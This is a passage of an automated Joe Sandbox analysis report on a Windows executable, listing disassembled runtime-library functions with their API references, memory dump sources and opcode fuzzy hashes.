                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                                          • Instruction ID: 64365f96931cb2c451636e70aff85413b8bedb6a02fa4cc2de25a6efade4bcc6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C41AF3291C20987EBA6BA15A55127D77E0EB56B80F140235DA9EC3ED1CF3CE503C756
                                                                                                                                                                                                                          Function 00007FF641F276A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _fread_nolock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 840049012-0
                                                                                                                                                                                                                          • Opcode ID: 23984c9b0e92b3499d0e452eca00665f4f26c6b08eca85ad94915f629dbeb913
                                                                                                                                                                                                                          • Instruction ID: 3f086e65600b20e03500ef904a5dbef6a2004e48846e8129eb9d9d4868561cb1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23984c9b0e92b3499d0e452eca00665f4f26c6b08eca85ad94915f629dbeb913
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9218221B1CA9245FB96BB16A9043FAA681BF55BD4F884530DD0D8B7C6CE7EE043C600
                                                                                                                                                                                                                          Function 00007FF641F3AC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                          • Instruction ID: 3270407dd56f64c00c935922f4ac2cbafab8db6ed8d18d3db663aca53ca8f847
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4431A121A1CA5A82F793BB96D84137D66D0AB50BA0F510235DA2DC3BD2CF7CE4438722
                                                                                                                                                                                                                          Function 00007FF641F38C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3947729631-0
                                                                                                                                                                                                                          • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                          • Instruction ID: 1f5bcc6df5c3e40c86d574032baebb5652bf917652ab7c4211864aca8764092f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0218D32A19A098AEBA6BF64C4442AC33E0FB04358F84063AD61C97FD5DF3CE446C741
                                                                                                                                                                                                                          Function 00007FF641F352A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                          • Instruction ID: 7803e39f6ace7022cd1eccb51aab0a5d076872be9ff92db3339b82ee7bbefd87
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE114D21A1D68982EBE2BF51D40127EA2E4BF95B80F444531EA4CD7EE6CE7CE5438742
                                                                                                                                                                                                                          Function 00007FF641F45664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                          • Instruction ID: 0b4993eadb240eff9e31308cc93efaad151c2ca3aa4cd811f2099f78eab10ac3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6721657261CA8686DBA2BF18E54037976E0EB94B94F544234E65D876E9DF3CE4028B00
                                                                                                                                                                                                                          Function 00007FF641F2F6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                          • Instruction ID: 1fca188380d8d8cbf2d343f46a9169c3744e155c63fe5170bf0f38dd6ecf2326
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D01E121A1C78641EB86FB5299000A9A6D4BB95FE0F484230DE6CC3FD6DE3DE1038300
                                                                                                                                                                                                                          Function 00007FF641F3720C Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                                                                                                                                          • Instruction ID: 9bbe4a92c9e237224ac684e9b89fd8a225d22c8dee06371ecb6dc72bc8200962
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3018020E0DA8A41FFE6BB61A94127952D0AF45794F080334F95DC3EC6DE2CE4438A02
                                                                                                                                                                                                                          Function 00007FF641F46F84 Relevance: 1.5, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F3C90C: HeapAlloc.KERNEL32(?,?,?,00007FF641F2FFB0,?,?,?,00007FF641F3161A,?,?,?,?,?,00007FF641F32E09), ref: 00007FF641F3C94A
                                                                                                                                                                                                                          • RtlReAllocateHeap.NTDLL(?,?,00000000,00007FF641F4274B,?,?,?,00007FF641F39267,?,?,?,00007FF641F3915D,?,?,?,00007FF641F3953E), ref: 00007FF641F46FF1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocAllocate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2177240990-0
                                                                                                                                                                                                                          • Opcode ID: e382dc26276f22423dcda25660a1935eb2fafde86fe36b33accd7187197a4d18
                                                                                                                                                                                                                          • Instruction ID: 4ac917746c5f9b11d4dab3ae454d92892ee579b5b8e0c364327f2a1f85d0e059
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e382dc26276f22423dcda25660a1935eb2fafde86fe36b33accd7187197a4d18
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46016D10E0C64740FFD6BBA2A64027912D06FA8BF0F984231ED6EC7AC2FD2CE4474A01
                                                                                                                                                                                                                          Function 00007FF641F37548 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                                                                          • Instruction ID: 5ebd6fe65a597229aca3421bce46adaca0717a9703f4cc35b9f6e8000aa39ab1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9E0EC91E0C68F42FBDA7AE8458227D11D09FA4340F945130D90987AC3DD1C7847A623
                                                                                                                                                                                                                          Function 00007FF641F3DEA8 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,00000000,00007FF641F3A63A,?,?,?,00007FF641F343FD,?,?,?,?,00007FF641F3979A), ref: 00007FF641F3DEFD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                          • Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                                                                          • Instruction ID: a8e1bb25efca1823eaf6767ee4eb9e2bfa4195930dcad284c58f077ec6ec2e74
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55F06D50B0D24B80FFD6B7B299513B552D06FA8B80F884130D90EC7BD2DE2CE4878222
                                                                                                                                                                                                                          Function 00007FF641F3C90C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,?,00007FF641F2FFB0,?,?,?,00007FF641F3161A,?,?,?,?,?,00007FF641F32E09), ref: 00007FF641F3C94A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                          • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                          • Instruction ID: a63ab22bec85efa9cdef0c46e86ea8ad5b15aa146ad1542fa0d7e3035dd720b8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FF05810B1E24F84FFD677B2591137916C05F98BA0F0A4231EC2FC7AC2EE2CA4638112

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 00007FF641F2C44C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3140674995-0
                                                                                                                                                                                                                          • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                                          • Instruction ID: ae6e4520795b2bff434007bb3f17861d4e9dd203a2ccd2dd8c6b33b9215edae1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B314D76618B8186EBA1AF60E8403EE73A0FB94744F44403ADA4D87B99EF3CD649C714
                                                                                                                                                                                                                          Function 00007FF641F229E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$ErrorFormatLast
                                                                                                                                                                                                                          • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                                                                                                                                          • API String ID: 3971115935-1149178304
                                                                                                                                                                                                                          • Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                                                                                                          • Instruction ID: 269523b70a06292eca85c63deac665ae463f356a5746a62b8cfae8629987489e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE215E7261CA8582E771BB50F8506EA73A4FB88784F400136EBCD93A99DF7CD1478B44
                                                                                                                                                                                                                          Function 00007FF641F44F10 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F44F55
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F448A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F448BC
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C58: RtlFreeHeap.NTDLL(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C6E
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C58: GetLastError.KERNEL32(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C78
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF641F39BEF,?,?,?,?,?,00007FF641F39ADA), ref: 00007FF641F39C19
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF641F39BEF,?,?,?,?,?,00007FF641F39ADA), ref: 00007FF641F39C3E
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F44F44
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F44908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F4491C
